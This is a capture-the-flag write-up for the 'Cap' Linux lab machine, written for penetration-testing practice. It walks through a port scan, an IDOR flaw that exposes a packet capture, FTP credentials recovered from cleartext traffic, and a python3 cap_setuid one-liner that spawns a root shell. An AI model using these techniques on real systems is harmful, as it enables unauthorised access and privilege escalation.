# Cap

OS: Linux 

Difficulty: Easy

## Port Scanning

```
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack gunicorn
```

#### checking out the website

![](https://user-images.githubusercontent.com/53917092/120903619-8acd6580-c61d-11eb-87c0-3faeb9725699.png)

Now we know that this site is used for network monitoring and that there is a user named Nathan.

Checking out "Security Snapshot"

![](https://user-images.githubusercontent.com/53917092/120903720-2b238a00-c61e-11eb-8ac9-de3df3a134dc.png)

This option redirects us to /data/1 where no traffic is logged. I changed it to /data/0 and here we see that there is some recorded traffic.

![](https://user-images.githubusercontent.com/53917092/120903730-3c6c9680-c61e-11eb-876e-d2e75b072f81.png)

I clicked to download and got a file called 0.pcap so I opened it with wireshark.

## User

![](https://user-images.githubusercontent.com/53917092/120903766-72aa1600-c61e-11eb-9f7a-8b7091209832.png)

In this file, we can see a lot of important information. We see that the user made http requests to the site. We see some TCP requests. But the main thing is that we see some FTP requests, where we can get Nathan's username and password on the FTP server.

Sorting the requests by protocol and navigating to the end of the file we find this information.

![](https://user-images.githubusercontent.com/53917092/120903978-d4b74b00-c61f-11eb-9156-488ad5edc8d3.png)

user: nathan 

password: Buck3tH4TF0RM3!

![](https://user-images.githubusercontent.com/53917092/120904027-3081d400-c620-11eb-98aa-a3050f5c64c8.png)

We can download the user flag running

> get user.txt

We can also use these credentials to log in in ssh.

> ssh nathan@\<box\_ip>

> password: Buck3tH4TF0RM3!

## Privesc

After some simple enumerations, I saw that the file /var/www/html/app.py had a line written "os.setuid(1000)". That led me to enumerate the binaries with capabilities to change their own uid to 0 (from root)

> getcap -r / 2>/dev/null

```
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
```

We see that python3 is allowed to change its own uid. We can make a program that changes its uid and run a shell as root.

> python3 -c 'import os;os.setuid(0);os.system("bash")'

![](https://user-images.githubusercontent.com/53917092/120905497-c588cb00-c628-11eb-844a-11d9761b9458.png)

## Helpful links:

### Web

* [portswigger](https://portswigger.net/web-security/access-control/idor)
* [geeksforgeeks](https://www.geeksforgeeks.org/insecure-direct-object-reference-idor-vulnerability/)
* [owasp](https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html)
* [hacktricks](https://book.hacktricks.xyz/pentesting-web/idor)

### User

* [hacktricks - wireshark](https://book.hacktricks.xyz/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks)
* [hacktricks - pentesting FTP](https://book.hacktricks.xyz/pentesting/pentesting-ftp)

### Privesc

* [hacktricks - linux privesc](https://book.hacktricks.xyz/linux-unix/privilege-escalation)
* [GTFOBins - python](https://gtfobins.github.io/gtfobins/python/)